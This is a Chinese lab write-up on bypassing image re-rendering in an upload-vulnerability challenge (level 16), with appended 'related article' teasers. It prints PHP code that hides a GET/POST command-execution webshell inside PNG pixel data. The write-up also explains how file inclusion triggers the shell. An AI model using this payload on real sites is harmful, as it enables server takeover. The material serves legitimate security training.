文件上传漏洞第十六关

news2024/12/26 11:35:21

文件上传漏洞

  • 解题

解题

首先查看一下页面情况
在这里插入图片描述
一如既往的是上传图片文件,这里提示我们本题对上传的图片重新进行了渲染。也就是说,我们这里上传的图片将会被打乱重组,那么如果还是将一句话木马和图片拼接,然后上传的话,那么一句话木马的完整性可能会被打乱,也就实现不了了。

那么我们就需要做出一些改变,使用另外一种方法。

<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
           0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
           0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
           0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
           0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
           0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
           0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
           0x66, 0x44, 0x50, 0x33);
 
 
 
$img = imagecreatetruecolor(32, 32);
 
for ($y = 0; $y < sizeof($p); $y += 3) {
   $r = $p[$y];
   $g = $p[$y+1];
   $b = $p[$y+2];
   $color = imagecolorallocate($img, $r, $g, $b);
   imagesetpixel($img, round($y / 3), 0, $color);
}
 
imagepng($img,'./1.png');
?>

这里是一段图片生成代码,可以实现我们木马的传入,同时在图片被二次打乱时,木马不会发生变化。
运行此代码,
在这里插入图片描述
这里我是将图片放置在了第十六关的目录下面,生成的图片为1.png

上传图片看一下。
在这里插入图片描述
图片上传成功,那我们再来看一下,上传的木马是什么
使用记事本运行图片看一下
在这里插入图片描述
很明显,这里是先GET传参一个值,然后再POST传参。
这里一个简单的办法就是使用Fiefox的插件HackBar帮助实现两次传参,或者就是使用抓包的方式,先get传参,然后抓到这个包之后,再修改使用POST传参。
这里我们就看一些火狐浏览器的插件上传。
在这里插入图片描述
其实这里的主要问题还是文件包含漏洞,如果没有文件包含,这里也是无法解决的。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/995311.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

2023.9.6 Redis 的基本介绍

目录 Redis 的介绍 Redis 用作缓存和存储 session 信息 Redis 用作数据库 消息队列 消息队列是什么&#xff1f; Redis 用作消息队列 Redis 的介绍 特点&#xff1a; 内存中存储数据&#xff1a;奠定了 Redis 进行访问和存储时的快可编程性&#xff1a;支持使用 Lua 编写脚…

Flink CDC 菜鸟教程 -环境篇

本教程将介绍如何使用 Flink CDC 来实现这个需求, 在 Flink SQL CLI 中进行,只涉及 SQL,无需一行 Java/Scala 代码,也无需安装 IDE。 系统的整体架构如下图所示: 环境篇 1、 准备一台Linux 2、准备教程所需要的组件 下载 flink-1.13.2 并将其解压至目录 flink-1.13.2 …

MAC安装JDK8

说明 mac版本&#xff1a;MacBook Pro Intel mac系统&#xff1a;macOS Ventura 13.5.1 开始我试着用linux版本的jdk&#xff0c;通过解压的方式安装jdk&#xff08;先解压然后配置环境变量&#xff0c;类似linux安装步骤&#xff09;&#xff0c;但是有各种问题。比如修改环境…

价值10万的最强爽文短剧合集 短剧素材300多部

这是一个包含300多部短剧视频素材的集合&#xff0c;旨在为您的视频创作项目提供尽可能丰富和多样的选项。这些素材涵盖了各种类型和风格&#xff0c;包括但不限于喜剧、悲剧、惊悚、浪漫和冒险等&#xff0c;以满足您的多样化创作需求。 每部短剧视频素材都经过精心挑选和处理…

springboot集成Actuator+Prometheus+Grafana

一、环境准备 PrometheusGrafana环境准备 请参考我的博文&#xff1a;https://blog.csdn.net/luckywuxn/article/details/129475991 二、代码准备 我在本次实践中使用的springboot版本是2.6.13,然后在pom.xml文件中增加一下配置 <dependency><groupId>org.sprin…

【实训项目】基于JavaWeb的图书销售购物系统

1.引言 随着互联网的快速发展和普及&#xff0c;电子商务已经成为了人们购物的主要方式之一。在电子商务领域中&#xff0c;图书销售一直是一个重要的组成部分。随着人们对知识和阅读的需求不断增长&#xff0c;图书销售市场也呈现出蓬勃发展的态势。 传统的图书销售模式存在…

速学Linux丨一文带你打开Linux学习之门

前言 如果你是刚开始学习Linux的小白同学&#xff0c;相信你已经体会到与学习一门编程语言相比&#xff0c;学习Linux系统的门槛相对较高&#xff0c;你会遇到一些困惑&#xff0c;比如&#xff1a; 为什么要学习Linux&#xff0c;学成之后我们可以在哪些领域大显身手&#xf…

GitHubGiteeGitlab极狐(JihuLab)同时配置SSH公私钥详细过程

GitHub-微软-github.com Gitee-开源中国- gitee.com Gitlab-乌克兰GitLab 公司-gitlab.com 极狐(JihuLab)-中国代理商运营的Gitlab -gitlab.cn或者jihulab.com 使用SSH公钥可以让你在你的电脑和GitHub等平台通讯的时候使用更安全的连接&#xff08;Git的Remote要使用SSH地址&a…

第6篇 vue的打包工具webpack

一 webpack 1.1 webpack的作用 webpack是一个打包工具&#xff0c;可以把多个静态资源文件打包成一个文件。如图所示&#xff1a; 1.2 webpack的打包案例

游戏开发入门——CocosCreator实现

课程介绍 课前介绍 为什么要开这门课&#xff1f; 其实市面上已经有很多关于游戏开发的课程了&#xff0c;而且都各有千秋。但是。 目前市面上的编程课很多标榜的零基础&#xff0c;但是很多名词都没有做相应的解释。我觉得对于初学者来说&#xff0c;可能还是有些难度。课…

Sketch for mac v98.2最新版 修复了打开某些文档时导致 Sketch 崩溃的错误

Sketch是一款专为Mac操作系统设计的矢量图形编辑软件&#xff0c;被广泛应用于UI/UX设计、网页设计、移动应用设计等领域。Sketch提供了各种工具和功能&#xff0c;包括绘图、图形设计、排版等&#xff0c;可以帮助设计师轻松地创建高质量的矢量图形和模型。 Sketch for mac更…

Go for循环中的defer

背景 写个后台程序&#xff0c;定时抓取服务器指标&#xff0c;代码逻辑如下&#xff0c;使用一段时间后内存不断增加 func CollectInfo() {for {// 获取服务器信息代码// ...............resp, err : http.Post("http://server", "application/json", str…

buuctf crypto 【RSAROLL】解题记录

1.打开文件&#xff0c;发现数据 2.rsa算法中的n&#xff0c;e&#xff0c;多个c都已经给出&#xff0c;写出脚本计算出每个c对应的m值转换成字符即可 3.运行得到flag

哈希切割 及 海量数据处理面试题讲解

文章目录 哈希切割及海量数据处理面试题讲解问题1问题2 哈希切割及海量数据处理面试题讲解 问题1 给两个文件&#xff0c;分别有100亿个query字符串&#xff0c;我们只有1G内存&#xff0c;如何找到两个文件交集&#xff1f;分别给出精确算法和近似算法 近似算法&#xff1a…

PL2303串口不支持WINDOWS11解决方法

1.打开设置管理器--端口选择不支持的串口--右击--选择卸载驱动--刷新 即可使用 2.禁用驱动更新:保存下面为 "disable_win11_update_driver.reg", 双击加入注册表 Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\W…

【商业知识】中国消费者洞察

文章目录 一、市场: 中国消费市场已进入复苏期二、政策: 政策不断优化消费环境三、社会: 消费者逐步步入正确消费时代四、品牌: 科普专业知识&#xff0c;加深消费者对技术力的感知五、电商直播: 提供源头优质产品&#xff0c;提高生活质量六、信息平台: 科学消费和内容营销&am…

【Java Web】Kafka,构建TB级异步消息系统

1. 阻塞队列 BlockingQueue 解决线程通信的问题&#xff1b;阻塞方法&#xff1a;put从队列中存一个 &#xff0c; take 从队列中拿出一个 生产者消费者模式 生产者&#xff1a;产生数据的线程&#xff1b;消费者&#xff1a;使用数据的线程。 实现类 ArrayBlockingQueueLinke…

pyqt5调用摄像头

pyqt5调用摄像头 1、UI布局 2、代码 # !/usr/bin/python # -*- coding: utf-8 -*-""" contact: 微信 1257309054 file: t.py time: 2023/9/10 0:16 author: LDC """import sysimport cv2 from PyQt5 import QtCore from PyQt5 import QtWidget…

buuctf crypto 【RSA】解题记录

1.打开文件后&#xff0c;可以看到公钥&#xff0c;打开后解析公钥 2.分解一下n&#xff0c;得到p&#xff0c;q&#xff08;使用yafu分解&#xff09;后&#xff0c;写出脚本 3.运行&#xff0c;得到flag

Emscripten安装并配置环境变量

前言 Emscripten官网 官网有安装教程&#xff0c;但有些细节没有讲清楚&#xff0c;本文会很详细的讲解每一步。 一、下载 emsdk 包 emsdk – github地址 可以使用 git 去拉取&#xff0c;不过可能会超时拉取失败。 git clone https://github.com/emscripten-core/emsdk.…